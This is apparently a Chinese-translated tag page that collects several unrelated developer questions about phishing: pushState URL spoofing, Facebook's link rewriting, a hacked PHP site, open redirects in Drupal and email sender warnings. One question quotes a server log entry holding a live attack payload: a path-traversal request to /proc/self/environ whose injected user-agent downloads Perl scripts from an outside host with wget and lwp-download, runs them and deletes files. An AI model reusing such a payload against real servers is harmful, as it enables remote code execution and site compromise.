问题标签 [phishing]

从GitHub 的博客中可以看出，他们已经实现了HTML5 的 JavaScriptpushState功能用于树浏览（适用于现代浏览器），带来了没有 Hash Bangs的 AJAX 导航。

代码很简单：

这非常优雅地允许他们：

1. 通过 AJAX 请求新内容而不是整页
2. 动画过渡
3. 并更改浏览器 URL （不仅仅是#，就像 Twitter 所做的那样 — twitter.com/stackexchange → twitter.com/#!/stackexchange）

我的问题是，JavaScript 如何防止pushState一个网站使用模仿另一个网站，从而导致令人信服的网络钓鱼攻击？

至少域似乎无法更改，但是站点内的多个路径可能由多个不相关且不信任的内容提供者提供呢？一条路径 (IE /joe ) 是否可以本质上模仿另一条路径 (pushState /jane ) 并提供具有可能恶意目的的模仿内容？

我担心以下代码的性能问题

所有 URL 都有 98% 的可能性是干净的。3 个 URL 在搜索中大约需要 6-9 秒（没有分析，随机搜索），并且由于我们处理的性质，我们不能一次搜索所有 URL。有没有更好的方法来搜索多个 URL 而无需每次都经过循环？

很长一段时间以来，我注意到当您尝试复制链接位置或在 Facebook 上打开链接时，它会修改链接并将其传递给l.php.

例如，我可以被发送到

即使我的浏览器将链接预览呈现为http://www.google.com/.

今天，我使用 Firebug 仔细查看，发现 Facebook 放入onmousedown="UntrustedLink.bootstrap($(this)[...]了<a>标签。第二次我右键单击该链接，我看到了hrefFirebug 中的属性更改。

这让我很担心。

我们中的许多人向不太精通技术的人提供的建议（在单击之前检查链接会将您带到哪里，以免您成为网络钓鱼的受害者）现在似乎变得毫无用处。这不是安全风险吗？钓鱼网站不能滥用这个吗？

为什么浏览器不通过禁止onmousedown更改href或在读取属性之前运行 javascript来阻止这种行为href，以便我被发送到我想去的位置，而不是我点击它时的一个更改？

编辑：我想简单强调一下，比网络钓鱼风险更困扰我的是用户被误导了，我觉得这可能发生是错误的，无论是否来自受信任的来源。

我的网站遭到网络钓鱼攻击。这是一个复杂的网站，但我只使用 post 和 PHP 文件。

他们怎么可能攻击我？我只使用 $_POST 所以我相信没有 SQL 命令和参数是可见的。没有框架，只有我在网站上的小编码列表和访问。

任何提示/建议将不胜感激。

抱歉，如果我没有直接回复，但我正在与阻止整个网站的提供商打交道。

这是他们的答案（欢迎对此发表任何评论）：

由于脚本注入攻击站点代码本身，它能够完全避开网络服务器的安全性。不幸的是，一些内容管理系统（尤其是旧版本的 Joomla）极易受到这种形式的攻击。

消除攻击者使用此方法的能力的一种简单方法是在网站的顶层添加一个包含以下内容的 php.ini 文件 - 请注意，尽管该网站之后需要测试以确保没有合法的网站脚本操作已受到更改的影响：

php.ini 指令是...

allow_url_include = "0"

allow_url_fopen = "0"

更新：

这是我从虚拟主机公司得到的：

121.254.216.170 - - [12/Sep/2011:05:21:07 +0100] “GET /?p=../../../../../../../../ ../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "http://some.thesome.com/etc/ byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http://some.thesome.com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget http: //some.thesome.com/etc/update.txt;perl update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?>"

Alice 想从 Bob 那里知道敏感资源的位置。Bob 好心地告诉 Alice 位置，但是 Alice 怎么能确定 Bob 的身份呢？

Bob 是一个 OpenBSD 服务器，数据源是一个 Python/C++ App。

我的想法是：

Alice 知道 Bob 的公钥。

Alice 用 Bob 的公钥加密一个随机字符串，并将其发送给 Bob。

Bob 恢复随机字符串，并对其进行哈希处理。Bob 将敏感资源连同哈希一起发回。

这种方法的问题是：我可以安全地将私钥存储在 Bob（服务器）上吗？如何？有更好的解决方案吗？

我的 .net 应用程序使用框架。目前存在通过框架发生的网络钓鱼。有没有办法以编程方式控制它。另外，建议使用一种工具来查找此类网络钓鱼攻击。

是否有一项服务可以让我检查 URL 以查看它是否可能是危险站点？

当用户通过单击不受信任的链接退出我们的应用程序时，我们会通过“您确定要离开”重定向屏幕向他们发送。快速检查一下我们是否也应该警告用户是一个不错的选择。

如何强制子 html 元素在父元素的边界内，这样即使绝对定位的子元素仍然保持在父元素的边界内（或被裁剪）。

我这样做是因为我想防止子内容的作者使用绝对定位的元素“覆盖我的页面内容”。

我不想使用 iframe。我最好的解决方案是使用 javascript 来查找样式位置设置为“绝对”或“固定”的所有子元素，并将它们转换为“静态”，但是我会喜欢更好的方法，最好是非 javascript 方法。任何帮助都是很好的帮助。

注意：设置style="position:relative;" 对于父元素，仅针对style="position:absolute;"的子元素解决它 , 而不是style="position:fixed;"

我想知道如何禁止任何人输入类似于www.example.com/?q=http://www.evilsite.com的网址 ，而是将他们重定向到 404 页面或其他内容。如您所见，这引入了网络钓鱼漏洞。我知道这是可能的，因为我已经看到以前的安装重定向

仅供参考，我目前启用了干净的 URL。我的安装是drupal 6.x

我正在从我的 .net 应用程序发送帐户激活电子邮件。

我将发件人地址设置为“xyz.support@gmail.com”和名称“xyz”，其中xyz 是域的名称，即我们的网站。

当我们使用 Google 的 SMTP 服务器时这不是问题，因为我在发送过程中向 google 提供了凭据。但现在我使用自己的网络服务器的 SMTP 发送电子邮件。

当我在 gmail 中查看激活电子邮件时，我得到以下信息：

此邮件的发送者可能不是：xyz.support@gmail.com 了解更多 报告网络钓鱼

有没有办法摆脱这种情况，使 gmail 和其他客户端不显示此消息？

这是代码：

谢谢